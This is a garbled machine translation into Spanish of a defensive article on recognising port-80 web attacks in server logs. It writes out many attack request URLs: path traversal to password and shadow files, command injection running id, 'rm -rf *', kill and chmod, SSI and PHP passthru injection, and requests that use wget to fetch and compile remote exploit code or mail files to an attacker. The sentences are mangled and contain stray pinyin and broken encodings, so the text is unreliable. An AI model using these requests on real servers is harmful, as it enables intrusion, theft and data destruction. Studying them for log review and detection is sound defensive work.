I. Resumen
II. Una descripción detallada de
III. Nuevos
IV. Análisis de evitar la propagación
V. La transcodificación
VI. Conclusión
[Resumen]
sitio web 80 como el puerto de servicio por defecto, sobre los problemas de seguridad diversos mantenerlo fuera de la liberación, algunas de estas vulnerabilidades permiten a un atacante obtener incluso el permiso del administrador del sistema para entrar en el sitio en sí, el siguiente es el puerto Zenomorph 80 ataques contra algunos de los rastros investigación, y decirle cómo encontrar los problemas de los registros de registro.
[] Detalle
Aquí, en parte a través de una serie de Lie Zi, y su visualización en la aplicación de servidor web en el ataque general, y las huellas dejadas por estos Liezi sólo es representativa de un modo de ataque de gran envergadura, y no todas las formas de ataque, esta parte descripción detallada de la función de cada ataque, y su manera de explotar estas vulnerabilidades a los ataques.
(1) "." ".." Y "..." petición
Las huellas de estos ataques son muy comunes para las aplicaciones web y el servidor web, que utiliza para permitir que un atacante o un programa gusano-virus para cambiar la ruta del servidor web, para obtener acceso a recintos cerrados. La mayoría de los programas de CGI con estas fallas, ".." petición.
Ejemplo:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Esto demuestra la solicitud atacante Liezi SDMO este archivo, si el atacante de la capacidad de avance de servidor web directorio raíz, a continuación, obtener más información y para obtener privilegios adicionales.
(2) "% 20" Solicitud de
20% es el valor hexadecimal que los 16 espacios, aunque esto no significa que usted puede utilizar cualquier cosa, pero cuando ve el registro, la encontrará, algunas aplicaciones de servidor Web que se ejecutan en este carácter puede aplicarse de manera efectiva Por lo tanto, usted debe revisar cuidadosamente el registro. Por otra parte, la solicitud puede ayudar a veces para realizar algunos comandos.
Ejemplo:
http://host/cgi-bin/lame.cgi?page=ls% | 20-Al
Esta muestra Liezi atacante ejecutar un comando de Unix, con indicación del catálogo completo de los documentos solicitados, haciendo que el atacante para acceder a archivos importantes en su sistema, le ayudará a proporcionar más las condiciones para la obtención de privilegios.
(3) "% 00" Solicitud de
00% dijo que el hexadecimal de 16 bytes vacío, él fue capaz de engañar a la aplicación web, y solicitar distintos tipos de archivos.
Ejemplos:
http://host/cgi-bin/lame.cgi?page=index.html
Esto puede ser una solicitud válida en la máquina, si un atacante consciente de esta petición tuvo éxito, se buscará seguir los procedimientos cgi.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Tal vez el programa CGI no acepta esta petición, ya que es la solicitud para verificar el sufijo de nombre de archivo, tales como: tipos html.shtml u otro de los archivos. La mayoría de los programas le dirá el tipo de archivo solicitada no es válida, esta vez se le dirá al atacante pide el archivo debe ser un personaje de un sufijo de tipo de archivo, por lo que un atacante puede obtener la ruta de sistema, nombre de archivo, dando por resultado su sistema de información más sensible
00html% http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
La atención a esta solicitud, hará trampas programa cgi que este documento es determinar los tipos de archivo aceptables, algunas aplicaciones de las inspecciones eficaces como archivo de solicitud de estúpido, que normalmente se usa métodos de la atacante.
(4) "|" solicitud
Se trata de una barra vertical, en el sistema Unix, un pedido de ayuda en la ejecución de comandos del sistema varias al mismo tiempo.
Ejemplo:
# Access_log | grep-i gato ".."
(Este comando mostrará el registro en el ".." solicitud, de uso común en los ataques y gusanos encontrados)
A menudo encontramos que muchas aplicaciones web utilizan este personaje, esto también da lugar a falsas alarmas en los registros de IDS.
En el examen cuidadoso de su aplicación, por lo que la ventaja de reducir las falsas alarmas en los sistemas de detección de intrusiones.
Éstos son algunos de Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Este comando solicitud, los siguientes son algunos cambios en Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%% 20-al | 20/etc
Esta solicitud está incluido en un sistema Unix / directorio etc de todos los archivos
% Http://host/cgi-bin/lame.cgi?page=cat 20access_log% | grep 20-20% i "cojo"
El comando cat solicitud de ejecución y la aplicación del comando grep también, echa un vistazo a los cojos "
(5) "," solicitud
En los sistemas Unix, este carácter permite la ejecución de varias líneas de comandos
Ejemplo:
Id #; uname-a
(Aplicación del comando id, seguido por la aplicación del comando uname)
Algunos programas web con este carácter, puede resultar en su IDS registra un aviso del fallo, usted debe revisar cuidadosamente su programa de web, de modo a reducir el riesgo de fracaso de las alertas de IDS.
(6) " " y " " Solicitud
En caso de ver sus registros de registro de los dos personajes, una serie de razones, la primera es el carácter que los datos añadidos en el documento
Ejemplo 1:
# Echo "su hax0red h0 h0" / etc / motd (solicitud motd información escrita en este documento)
Un atacante puede utilizar fácilmente la solicitud, lo anterior a manipular su página web. Tal como el famoso RDS explotar el atacante se utiliza a menudo para cambiar la página web.
Ejemplo 2:
Http://host/something.php=Hi 20mom%%% 20Im 20Bold!
Html te darás cuenta de que el lenguaje de los signos aquí, él también pasó " "," " personajes, estos ataques no puede hacer que el atacante para acceder al sistema, se confunde la gente piensa que esto es una información de sitios web legítimos (que conduce a La gente suele visitar en este enlace para acceder a la dirección indicada por el atacante, las mismas podrán ser convertidos en 16 en el hexagonal de caracteres codificados Xing Shi, Shi atacar a los signos evidentes de Buna Me)
(7) "!" Solicitud
El lenguaje común sobre este personaje solicitud SS (Server Side Include) me ataque, si el atacante es un atacante confundir el usuario hace clic en el conjunto de enlace, y el mismo que el anterior.
Ejemplo:
http://host1/something.php =
El Lieh-tzu es un ataque puede estar haciéndolo para hacer un archivo de sitio de host2 host1 aparece encima (por supuesto, requieren que los visitantes a visitar a la configuración del atacante conexión. Esta petición puede ser convertida en 16 hexagonal codificación máscara, no se encuentran fácilmente)
Al mismo tiempo, este enfoque también puede ejecutar la autoridad de mando sitio web
Ejemplo:
http://host/something.php =
El Lieh plazo en el sistema remoto "id" de comandos, se mostrará id del usuario del sitio web, suele ser "nadie" o "www"
Esta forma permite también la incluye los archivos ocultos.
Ejemplo:
http://host/something.php =
Los archivos ocultos. Htpasswd no se mostrará, Apache se niegan a establecer las modalidades para. Ht el formulario de solicitud, y el logotipo de SSI pasará por alto estas restricciones, y conducir a problemas de seguridad
(8) "," Solicitud
Estos ataques destinado a intentar insertar una remota procedimientos de aplicación web PHP, que podría permitir a la orden de ejecución, dependiendo de la configuración del servidor, y otros trabajos de una serie de factores (por ejemplo, establezca el modo seguro de PHP)
Ejemplo: = http://host/something.php passthru ("id ");?
En alguna aplicación php simple, puede ser el portal de Internet sobre los derechos de usuario remoto del sistema para ejecutar el comando local
(9) "` "solicitud
Este personaje utiliza más tarde para ejecutar comandos en perl, los personajes de la aplicación web no es de uso frecuente, así que si usted lo ve en su registro, debe tener mucho cuidado
Ejemplo:
http://host/something.cgi = `id`
Escriba un programa en perl cgi en cuestión daría lugar a la ejecución del comando id
[] Véase también
La siguiente sección se debatirá la aplicación de más ataques podrían comando, junto con los documentos solicitados, y si tiene un defecto de ejecución remota de comandos, debe ser cómo comprobar el descubrimiento. Esta parte es sólo para darle una buena idea, y dígale a su sistema de lo que está sucediendo, los atacantes tratan de atacar a los rastros de su sistema, pero no enumera todos los del atacante utilizar los comandos y solicitudes.
"/ Bin / ls"
Este comando solicita la ruta completa, en las aplicaciones web que tiene esta laguna legal, si se registra en muchos lugares dicha solicitud, es posible que gran vulnerabilidad remota de ejecución de comandos, pero no necesariamente un problema También puede ser una falsa alarma. Una vez más recordó, aplicaciones web escritas (cgi, asp, php, etc ...) es la base de la seguridad
Ejemplo:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20-Al
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Esta es una ventana de la cáscara, si un atacante para acceder y ejecutar este script en la configuración del servidor en las condiciones permitidas en la máquina Windows puede hacer nada, un montón de gusanos es a través del puerto 80, la comunicación con la máquina remota
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Se trata de un dos archivos binarios, sus problemas y / bin / ls, como, si se registra en muchos lugares dicha solicitud, la excelente ejecución remota de comandos es posibles lagunas, pero no necesariamente un problema También puede ser una falsa alarma.
Se mostrará qué parte pertenece a cada usuario y grupo
Ejemplo:
| Http://host/cgi-bin/bad.cgi?doh=../../../../bin/id
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Este comando puede borrar archivos sin la debida utilización es muy peligroso
Ejemplos:
Http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf 20% * |
Http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wget y tftp" comando
Estos comandos son a menudo el atacante puede obtener privilegios adicionales para descargar archivos, wget es un comando de UNIX bajo, puede ser utilizado para descargar puertas traseras, tftp está bajo el comando de Unix y NT, se utiliza para descargar el archivo. Algunos gusanos se propagan por IIS tftp para copiar el virus a otros hosts
Ejemplos:
20http% http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget: / / http:// host2/Phantasmp.c | acogida / cgi-bin / bad.cgi? DOH =% 20http wget: / / www.hwa-security.net/Phantasmp.c;
"Gato" comando
Este comando se utiliza para ver el contenido del archivo, utiliza para leer la información importante, tal como archivos de configuración, archivos de contraseñas, archivos y documentos de crédito que se pueda imaginar
Ejemplos:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = cat% 20/etc/motd;
"Echo" comando
Este comando se utiliza para escribir datos en el archivo, como "index.html"
Ejemplos: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "# fc-kiwis% 20was 20here%"% 20 % | 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "# fc-kiwis% 20was 20here%"% 20 200day.txt%;
Comando "ps"
Enumera los procesos actualmente en ejecución, informe al atacante que un host remoto que ejecuta el software con el fin de tener una idea de las cuestiones de seguridad, para obtener permisos adicionales
Ejemplos: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% | 20-aux http://host/cgi-bin/bad. cgi? DOH =% 20-ps aux;
"Kill y killall" comando
Sistemas Unix para matar a este proceso, un atacante puede utilizar este comando para detener los servicios y procesos del sistema también puede borrar los rastros del atacante, alguna hazaña se producen gran cantidad de procesos hijos
Ejemplos:% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% | 20 http://host/cgi-bin/bad.cgi?doh=kill -9% 200;
"Uname" comando
Este comando le dice al atacante el nombre de la máquina remota, por algún tiempo, a través de este sitio web para saber qué isp, un atacante que se pueden visitar hoy en día. Uname-a para solicitar lo general, esas serán registrados en el archivo de registro
Ejemplos: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-un http://host/cgi-bin/bad |. cgi? DOH uname =% 20-a;
"CC, gcc, perl, python, etc ..." compilación e interpretación de la orden
El atacante a través de tftp descarga wget o explotar y utilizar el compilador cc, gcc para compilar esta en un programa ejecutable, y los privilegios de acceso más
Ejemplos: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc 20Phantasmp.c%;. / a.out% 20-p% 2031337;
Si consulta los registros encontrados en "perl" python "Estas instrucciones pueden ser un atacante remoto para descargar script en perl, python, y trató de obtener los privilegios de los locales
"Correo" de comandos
Los atacantes suelen utilizar este sistema de mando, algunos documentos importantes con buzón de correo propia del atacante, pero también dispuesto a e-mail atentados con bomba se llevan a cabo
Ejemplos: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20%
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." y otros comandos
Sistemas Unix a fin de que puedan cambiar el archivo de permisos
chown = permite establecer que el dueño del archivo chmod = permite establecer permisos de archivo = chgrp permite al propietario cambiar los permisos de grupo en los archivos chsh = permitido para cambiar el shell del usuario
Ejemplos:% 20777% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod 20index.html http://host/cgi-bin/ | bad.cgi? DOH =% 20777% chmod 20index.html;% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20zeno% 20 / etc / master.passwd% http://host/cgi-bin/bad.cgi?doh=chsh | 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" archivo
Este archivo es el sistema de la contraseña, por lo general fuera de la sombra, y no permite contraseñas encriptadas de ver, pero los que atacan, esto puede ser Zhidaonaxie visitante es válida y el sistema del sitio ruta absoluta Ming Chen y otra información, por lo general Youyu por la sombra de apagado, por lo que el atacante normalmente verá archivo / etc / shadow
"/ Etc / master.passwd"
Este archivo es el archivo de contraseñas del sistema BSD, contiene la contraseña cifrada, el archivo en la cuenta de root sólo es de sólo lectura, y algunos atacante no calificados abrirá su intento de leer su contenido., Si el sitio web es privilegios de root para ejecutar, a continuación, el atacante, podemos leer el contenido interior, un montón de problemas en el administrador del sistema se vienen uno tras otro
"/ Etc / shadow"
Contiene un sistema de contraseña cifrada, leer la misma en la cuenta de root, y / et / master.passwd casi
"/ Etc / motd"
Cuando los usuarios inician sesión en el sistema UNIX, la información aparece en el "Mensaje de la Jornada" El archivo, que proporciona información importante del sistema y administrador de los usuarios de algún conjunto, los usuarios que quieren ver a los que no lo son, También contiene la información de versión del sistema, el atacante suelen ver este archivo, para entender lo que el sistema se ejecuta en el atacante, el siguiente paso es la búsqueda de este tipo de sistemas, explotación, y un mayor acceso al sistema de privilegios
"/ Etc / hosts"
El documento proporciona la dirección IP y red de información, un atacante puede obtener más información sobre la configuración de red del sistema
"/ Usr / local / apache / conf / httpd.conf"
Se trata de un servidor web Apache archivo de configuración, un atacante puede entender, como cgi, información y otros ssi es accesible
"/ Etc / inetd.conf"
Este es el fichero de configuración de servicios inetd, un atacante puede obtener el equipo remoto, inicie los servicios, ya sea para utilizar el contenedor para controlar el acceso, si el contenedor se encontró en ejecución, un atacante el próximo paso será comprobar "/ etc / hosts.allow" y "/ etc /" hosts.deny, archivos, y que puede cambiar algunos ajustes, los privilegios de acceso
". Htpasswd. Htaccess y. Htgroup"
Estos archivos se utilizan típicamente en la autenticación de usuario del sitio Web, el atacante no podría ver estos documentos y obtener el nombre de usuario y contraseña, el archivo de contraseñas. Htpasswd se codifican a través de la rendija de algunos procedimientos simples para descifrar, así que visite el sitio del atacante áreas protegidas (por lo general el usuario con el mismo nombre de usuario y contraseña, el atacante puede incluso visitar otra cuenta)
"Access_log y error_log"
Estos son los archivos de registro de servidor apache, los atacantes suelen ver estos archivos, mira esas peticiones se registran, esas y otras solicitudes de diferentes lugares
Normalmente, el atacante se modificará estos archivos de registro, como su información de dirección propia, una ruptura atacante a través de un puerto 80 en su sistema, y también su sistema no hace copias de trabajo, sin otra condición registros Jiluchengxu sistema, que detección de intrusos se vuelve muy difícil trabajar
"[] Drive-carta: winntrepairsam._ o [letra de la unidad-]: winntrepairsam"
Sistema de Windows NT archivo de contraseñas, si el comando a distancia no se puede implementar, los atacantes suelen solicitar estos documentos, a continuación, "crack L0pht" del tipo de herramientas para descifrar contraseñas crack, si el atacante trata de atacar archivo administrador contraseña, si éxito, la máquina de control remoto será el atacante toma el control
[Análisis de desbordamiento]
En este artículo, no voy a decir mucho Guan Yu desbordamiento del tema, voy a dar a conocer Shuimingnaxie Xianxiang y huellas notables Él Tebieguanzhu lugar, el ataque de amortiguamiento a menudo atacan Zhetong transcodificación Guo y otros medios para encontrar Dadaobuyi
Aquí es un simple Lie Zi
Ejemplo: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Esta Liezi muestra el atacante en una aplicación para enviar un lote de un personaje, para probar el programa un desbordamiento de búfer, desbordamiento de búfer puede conseguir un control remoto de comandos permisos de acogida de ejecución, si el propietario tiene el setuid y procedimientos para la raíz, a través del rebosadero, puede tener acceso a todo el sistema, si no como el programa setuid, entonces el desbordamiento es sólo mediante la ejecución de los derechos del usuario del sitio web
Aquí no se puede saber todas las circunstancias, pero usted debe comprobar periódicamente su archivo de registro, si ese día de repente encontré un montón de peticiones, pero generalmente no más de la solicitud, significa que son objeto de ataques de desbordamiento, por supuesto, también puede ser Una nueva red ataque del gusano
[Transcodificación]
Todos los ataques antes mencionados solicitud, el atacante sabe por lo general los sistemas IDS solicitud de verificación mecánica a menudo, por lo general el atacante usará los datos de herramienta de conversión para convertir el formato de contenido solicitado de 16 bandas, dando lugar a IDS ignorará estas peticiones, Estamos familiarizados con la vulnerabilidad CGI herramienta de análisis que es un buen bigote Liezi. Si ve el registro de los tiempos que se encuentran un gran número de 16 bandas y no algunos caracteres comunes, entonces el atacante puede tratar de usar algunas de las formas de atacar el sistema
Una forma rápida de encontrar es que su archivo de registro de la solicitud de los hexagonal 16, copia a su navegador a través de navegadores Web pueden solicitar en Zhuanhua Zhengque, y mostrarles el contenido de la solicitud, si lo hace valor de tomar este riesgo, un simple hombre ASCII, le puede proporcionar el código correcto.
[] Conclusión
Este artículo no puede cubrir todos los 80 puertos del ataque, pero la mayoría se han citado más que el ataque general, y le dirá cómo comprobar los archivos de registro, y cómo agregar, como el número de reglas del IDS, escribir su objetivo es Web del administrador del sistema debe estar preocupado por lo que una buena idea, al mismo tiempo, espero que este artículo ayude a la web de los desarrolladores de programas web para escribir mejores programas
DE NOTA: Si usted tiene cualquier comentario y sugerencia, por favor envíe un e-mail admin@cgisecurity.com.